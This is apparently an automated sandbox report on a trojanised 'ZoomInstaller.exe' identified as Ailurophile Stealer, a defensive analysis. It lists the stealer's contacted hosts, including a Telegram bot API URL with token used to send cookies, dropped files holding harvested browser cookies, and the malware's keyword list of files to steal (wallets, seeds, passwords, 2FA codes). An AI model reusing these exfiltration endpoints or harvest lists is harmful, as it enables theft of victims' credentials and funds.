                                    https://ailurophilestealer.com/botZoomInstaller.exe, 00000000.00000002.2803793282.000000C000212000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://oneget.orgXpowershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.myip.comhttps://api.myip.comHTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyNO_PROXYno_proxyGeZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://aka.ms/pscore68powershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessageCookiesZoomInstaller.exe, 00000000.00000002.2806871390.000000C000410000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://oneget.orgpowershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ailurophilestealer.comZoomInstaller.exe, 00000000.00000002.2803793282.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000068000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001A4000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.drfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            149.154.167.220
                                            		api.telegram.orgUnited Kingdom
                                            		62041TELEGRAMRUtrue
                                            104.26.9.59
                                            		api.myip.comUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            188.114.97.3
                                            		manestvli.shopEuropean Union
                                            		13335CLOUDFLARENETUStrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1544493
                                            Start date and time:2024-10-29 14:08:21 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Run name:Run with higher sleep bypass
                                            Number of analysed new started processes analysed:22
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:ZoomInstaller.exe
                                            Detection:MAL
                                            Classification:mal76.troj.spyw.evad.winEXE@28/27@4/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 2
                                            • Number of non-executed functions: 3
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                            • Stop behavior analysis, all processes terminated

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: ZoomInstaller.exe

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            149.154.167.220https://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                              Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                  rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                            come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                              104.26.9.59file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
                                                                    5zFCjSBLvw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                      FySc2FzpA8.exeGet hashmaliciousGo InjectorBrowse
                                                                        setup.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, VidarBrowse
                                                                          1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                                                            SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRATBrowse
                                                                              SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRATBrowse
                                                                                188.114.97.3rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                • www.launchdreamidea.xyz/2b9b/
                                                                                rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                • www.cc101.pro/4hfb/
                                                                                QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • filetransfer.io/data-package/cDXpxO66/download
                                                                                Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                                • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                • www.rs-ag.com/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                api.myip.comfile.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC StealerBrowse
                                                                                • 104.26.9.59
                                                                                gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                                                • 104.26.8.59
                                                                                kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                                                                • 172.67.75.163
                                                                                Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                • 172.67.75.163
                                                                                eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                • 104.26.9.59
                                                                                iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.26.9.59
                                                                                7CTH165fQv.exeGet hashmaliciousLatrodectusBrowse
                                                                                • 104.26.8.59
                                                                                3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                                                                                • 172.67.75.163
                                                                                284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                • 104.26.8.59
                                                                                api.telegram.orghttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 149.154.167.220

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                TELEGRAMRUhttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                CLOUDFLARENETUShttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                                • 104.21.233.198
                                                                                Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6Get hashmaliciousMamba2FABrowse
                                                                                • 104.17.25.14
                                                                                rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                • 188.114.97.3
                                                                                https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                • 172.64.41.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                CLOUDFLARENETUShttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                                • 104.21.233.198
                                                                                Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6Get hashmaliciousMamba2FABrowse
                                                                                • 104.17.25.14
                                                                                rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                • 188.114.97.3
                                                                                https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                • 172.64.41.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Ailurophile.zip

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                Category:dropped
                                                                                Size (bytes):3541
                                                                                Entropy (8bit):5.935786559558992
                                                                                Encrypted:false
                                                                                SSDEEP:96:R166vt4lO3ya5+1JuV+1DeRPsUJRUu1Sm:BMO3R+LDexbRem
                                                                                MD5:2912FC24DB5466479288AC785DBDE17F
                                                                                SHA1:866E51E9E6199B5E9CBB48EFB7D23A023B7B0F09
                                                                                SHA-256:669C7EA5AEF59B759B7ECE5A0D5DB455C4DEFE1105A5EFFE963C349F6696F7BE
                                                                                SHA-512:CD9DCFE70A5757AA853DEAD1C338019D8CDB59063D5E4750C641A13936955D8D1AF9E5EE9C3B56D1F101C4A1956042CC1E734C0FD71952E6B0DD34BF21714B5A
                                                                                Malicious:false
                                                                                Preview:PK............................Ailurophile/PK............................Ailurophile\Autofills/PK........................#...Ailurophile\Autofills\Autofills.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP.....XZ.....S..._....._............X.S.......PK..G...S...V...PK............................Ailurophile\Cards/PK............................Ailurophile\Cards\Cards.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP......X.R..._........PK...@.`;...>...PK............................Ailurophile\Cookies/PK........................&...Ailurophile\Cookies\Google_Default.txt..Mr.0...u8....PP.Lg...EdBR...1.$......o.y.x..j.....I..1.........].&..`...#...`.I.,.....v@.[..4..e.M.:...P..krj^M.tw.R.KyK.mH.u.H%....q_......a.....X{}-c...x....4..c6feq=......q.[l.%..w..4...!....)Wp.9.....;E.s......[......aB...t4.'....PK...A.....C...PK............................Ailurophile\History/PK........................&...Ailurophile\History\Google-Default.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP.......Y\._T.

                                                                                C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):86
                                                                                Entropy (8bit):4.332226354824286
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3rbEKcJW5KeBF3R3AV:ziJi4wEJObEKcY5JFh3AV
                                                                                MD5:6617FAF8F3D5A4BAB9ED7E6D6D81E9AC
                                                                                SHA1:47C5D229C3D06A26D685B7C3357C9AA1951ED676
                                                                                SHA-256:3D87146BA69810E07CAD4BD64C1731D41A2359E5D97E47115CA467784FCFC7EB
                                                                                SHA-512:452F926F36BE843D2B76CDD7079B058986620419BB093B563AB17435B95B05D865B6903124723B2C9A60A04114EDE43CA6DEB2694AB7CCBCE4BF831B590855FE
                                                                                Malicious:true
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No autofills found for Google Default.

                                                                                C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):62
                                                                                Entropy (8bit):4.411474689552285
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3rZrln:ziJi4wEJOZZn
                                                                                MD5:7166946D592DA0325381A8F84248F7C7
                                                                                SHA1:5DEF442E33A3A6A1890C12055A000D5014E86CB8
                                                                                SHA-256:905E8F268FF0D5C67976E0AB04DCB91BB61A9495FB6E9E840B1CA7A962FA0D72
                                                                                SHA-512:FE482A1AE8F524823D522B95CE1393061328C4DD202A657D5CCFBD79FD326D7B3D504B7505D4C6F042089063CBA3E4F65468B579B93CBEC562BCB7EC402A0D08
                                                                                Malicious:true
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No cards found

                                                                                C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):323
                                                                                Entropy (8bit):5.909071500110722
                                                                                Encrypted:false
                                                                                SSDEEP:6:ziJi4wEJCk3rocHDKJlSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISslZk3rocHDyzxP:OJ1wEJCk79mlDuyXv3RdJqmOvO60lZkU
                                                                                MD5:C4417D2378E5C5DAA838C0B7F1721C5B
                                                                                SHA1:F294F974358E823DC19EE28CCA32D2F87C4AE010
                                                                                SHA-256:F9FC9FC04186CADE3470ABBF3B8868507AFB0E30D82AF90919CF3955D8902D95
                                                                                SHA-512:8D609E660616D454EBA937CD059742FEEA59734FDF356EC802DC64CCE81768018B8B8913F441A5B739E3FE1EAA621345306B5051F54CD9CBBA519BC9666CCE42
                                                                                Malicious:true
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn...google.com.TRUE./.FALSE.2597573456.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-06..

                                                                                C:\Users\user\AppData\Local\Ailurophile\History\Google-Default.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):66
                                                                                Entropy (8bit):4.485787733894543
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3+iJyn:ziJi4wEJv
                                                                                MD5:34603047D92D7328CEFA79DE178D1971
                                                                                SHA1:BE2435B5DAB5DD358E03F6C7FEE3C384826343CF
                                                                                SHA-256:F353C24B1CD9A4E0BF4EC5572387A68D85196E27B33F9E5F713DC8DCE23C19A0
                                                                                SHA-512:051DA884D5957CC781BCFDD665521CA32EC152068AC4684CDD1ABCC01F1FAC26ACBADF1CAADC4F0067DE2134FCD30120F0F4F4E1037996CE29783507CEA1AF71
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..[No history found]

                                                                                C:\Users\user\AppData\Local\Ailurophile\History\Microsoft-Default.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):66
                                                                                Entropy (8bit):4.485787733894543
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3+iJyn:ziJi4wEJv
                                                                                MD5:34603047D92D7328CEFA79DE178D1971
                                                                                SHA1:BE2435B5DAB5DD358E03F6C7FEE3C384826343CF
                                                                                SHA-256:F353C24B1CD9A4E0BF4EC5572387A68D85196E27B33F9E5F713DC8DCE23C19A0
                                                                                SHA-512:051DA884D5957CC781BCFDD665521CA32EC152068AC4684CDD1ABCC01F1FAC26ACBADF1CAADC4F0067DE2134FCD30120F0F4F4E1037996CE29783507CEA1AF71
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..[No history found]

                                                                                C:\Users\user\AppData\Local\Ailurophile\Passwords\Google-Default.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):65
                                                                                Entropy (8bit):4.422163682746226
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3rKNKXB5J:ziJi4wEJO8KXvJ
                                                                                MD5:4136A47D671A2B0555965D0175796441
                                                                                SHA1:7B25202479B7B0A124D026B75AE812359ACADBA8
                                                                                SHA-256:EB4F0DD5FDF480AA319E286ED9559193457EF36C1255B6F2B2E7A301E4AF4B9D
                                                                                SHA-512:E9D944AF278D6E9CFDF51C176FC53E3B9DB535568CD0A98E13EFCAF378E603195D5E54B295B0FBFF70546F92504BEBBF5B00818DEA71AEC84722D115FB026512
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No password found

                                                                                C:\Users\user\AppData\Local\Ailurophile\Passwords\Microsoft-Default.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):65
                                                                                Entropy (8bit):4.422163682746226
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3rKNKXB5J:ziJi4wEJO8KXvJ
                                                                                MD5:4136A47D671A2B0555965D0175796441
                                                                                SHA1:7B25202479B7B0A124D026B75AE812359ACADBA8
                                                                                SHA-256:EB4F0DD5FDF480AA319E286ED9559193457EF36C1255B6F2B2E7A301E4AF4B9D
                                                                                SHA-512:E9D944AF278D6E9CFDF51C176FC53E3B9DB535568CD0A98E13EFCAF378E603195D5E54B295B0FBFF70546F92504BEBBF5B00818DEA71AEC84722D115FB026512
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No password found

                                                                                C:\Users\user\AppData\Local\Ailurophile\info.txt

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:Unicode text, UTF-8 text, with very long lines (425)
                                                                                Category:dropped
                                                                                Size (bytes):991
                                                                                Entropy (8bit):5.003744577524848
                                                                                Encrypted:false
                                                                                SSDEEP:24:m19iRRpN8H+xalSPoonPaWu8DkiKTxp/AphGFWVZluLCIH1u6YBm1R:zB++QSdniiDL0ynVZl4H1MBmv
                                                                                MD5:1CAC849C2DB533D801F6B58E652E0A06
                                                                                SHA1:211B375E463DC65AFA408073232A06A90B9B2029
                                                                                SHA-256:122A28072BEDE072BD4C1EAA871AF228344D9445D4E4F0E5A87F8A0AE69A1166
                                                                                SHA-512:38476D619C72EFE49B7CF9B41CED524C115B0800C7AE77728140863015DF24BC8C15DB6309830C5A6C7E47A36D1590F425FED893D0368A21BF8E7C74BB1E0C39
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - https://ailurophilestealer.com - Telegram: @Ailurophilevn..IP: 173.254.250.72.Country: United States.Hostname: 376483.PC Type: Microsoft Windows 10 Pro 10.0.19045.Architecture: amd64.File Path: C:\Users\user\Desktop.Main Path: C:\Users\user\AppData\Local\Ailurophile.Allowed Extensions: [rdp txt doc docx pdf csv xls xlsx keys ldb log].Folders to Search: [Documents Desktop Downloads].Files: [secret password account tax key wallet gang default backup passw mdp motdepasse acc mot_de_passe login secret bot atomic account acount paypal banque bot metamask wallet crypto exodus discord 2fa code memo compte token backup secret seed mnemonic memoric private key passphrase pass phrase steal bank info casino prv priv. prive telegram identifiant identifiants personnel trading bitcoin sauvegarde funds recup note].MAC Address: ec:f4:bb:2d:24:96.Screen Resolution: 1280x1024.Browsers:.Chrome Default - version: 117.0.5938.134.Edge Default - version: 117.0.2045.55.

                                                                                C:\Users\user\AppData\Local\Ailurophile\stolen_files.zip

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:Zip archive data (empty)
                                                                                Category:dropped
                                                                                Size (bytes):22
                                                                                Entropy (8bit):1.0476747992754052
                                                                                Encrypted:false
                                                                                SSDEEP:3:pjt/l:Nt
                                                                                MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                Malicious:false
                                                                                Preview:PK....................

                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.136471148832945
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
